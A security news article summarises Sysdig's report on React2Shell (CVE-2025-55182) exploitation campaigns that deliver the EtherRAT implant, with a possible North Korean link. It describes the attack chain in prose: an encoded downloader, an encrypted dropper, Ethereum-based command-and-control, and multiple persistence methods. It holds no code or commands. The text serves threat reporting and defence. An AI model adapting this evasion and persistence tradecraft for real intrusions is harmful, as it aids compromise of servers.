Security researchers at Sysdig have observed new campaigns exploiting React2Shell which appear to have the hallmarks of North Korean hackers.
React2Shell is a remote code execution vulnerability in React Server Components (RSCs). Tracked as CVE-2025-55182, the flaw has a maximum severity rating with a CVSS score of 10.0.
Publicly disclosed on December 3, the vulnerability impacts version 19 of the React open source library for creating application user interfaces as well as many other related frameworks, including Next.js, Waku, React Router and RedwoodSDK.
Quickly after it was made public, Amazon Web Services (AWS) confirmed that threat groups including Earth Lamia and Jackpot Panda, both linked to Chinese state interests, were among those launching exploitation attempts.
Other threat actors were also observed exploiting React2Shell, including opportunistic actors installing cryptocurrency miners (primarily XMRig) and credential harvesters targeting AWS configuration files and environment variables.
Now, the Sysdig Threat Research Team (TRT) said they have discovered a novel implant from a compromised Next.js application that delivers EtherRAT.
The Sysdig TRT’s analysis, published on December 8, reveals significant overlap with tooling from North Korea-linked campaign cluster dubbed ‘Contagious Interview.’ This suggests either North Korean actors have pivoted to exploiting React2Shell or that sophisticated tool-sharing is occurring between nation-state groups.
React2Shell-EtherRAT Attack Chain Explained
EtherRAT is a remote access trojan (RAT) that leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms and downloads its own Node.js runtime from nodejs.org.
“Rather than hardcoding a C2 server address, which can be blocked or seized, the malware queries an on-chain contract to retrieve the current C2 URL,” explained the Sysdig report.
The attack chain of the malicious campaign leveraging the React2Shell exploit follows four stages, each designed to establish persistent, evasive control over the compromised system:
- Initial Access: A base64-encoded shell command executes via React2Shell, deploying a persistent downloader that fetches a malicious script (s.sh) using curl/wget/python3 fallbacks and a 300-second retry loop
- Deployment: The downloaded script (s.sh) installs Node.js from nodejs.org (to avoid detection), creates hidden directories, and drops an encrypted payload and an obfuscated JavaScript dropper, then self-deletes
- Dropper: The JavaScript dropper (.kxnzl4mtez.js) decrypts the main payload using AES-256-CBC with hardcoded keys, writes the decrypted implant to disk, and executes it via the downloaded Node.js runtime
- Implant: The final payload establishes a persistent backdoor with blockchain-based C2, five redundancy mechanisms for persistence, and automatic payload updates, ensuring long-term access
Signs of Nation-State Groups’ Sophistication or Cooperation
These campaigns show similarities from multiple documented campaigns, including North Korean-linked campaigns.
For instance, the encrypted loader pattern used in these EtherRAT campaigns closely matches the North Korean-affiliated BeaverTail malware used in the Contagious Interview campaigns.
Sysdig noted that Google Threat Intelligence Group (GTIG) recently attributed the use of BeaverTail malware and blockchain-based C2 techniques to the North Korean-associated threat actor UNC5342.
“However, without direct code overlap, we cannot confirm the threat actor behind EtherRAT is the same. Given some of the significant differences listed above, this may represent shared techniques across multiple Democratic People’s Republic of Korea-affiliated (DPRK) threat groups,” the Sysdig researchers wrote.
“Alternatively, while DPRK actors may have adopted React2Shell as a new initial access vector, it’s possible another sophisticated actor may be combining techniques from multiple documented campaigns to complicate attribution,” they added.
If the attribution is confirmed, these new campaigns represent a significant evolution in tradecraft, where North Korean actors trade a smaller payload size for reduced detection risk.
“While Lazarus Group and other North Korean-linked threat actors historically bundle Node.js with their payloads, the sample we identified downloads Node.js from the official nodejs.org distribution,” the researchers explained.
According to Sysdig researchers, EtherRAT marks a “significant evolution in React2Shell exploitation,” shifting away from the typical opportunistic cryptomining and credential theft toward “persistent, stealthy access designed for long-term operations.”
The team highlighted that the malware’s “combination of blockchain-based C2, aggressive multi-vector persistence, and a payload update mechanism” reflects a level of sophistication “not previously observed in React2Shell payloads.” This suggests a more calculated and resilient threat model, they noted.
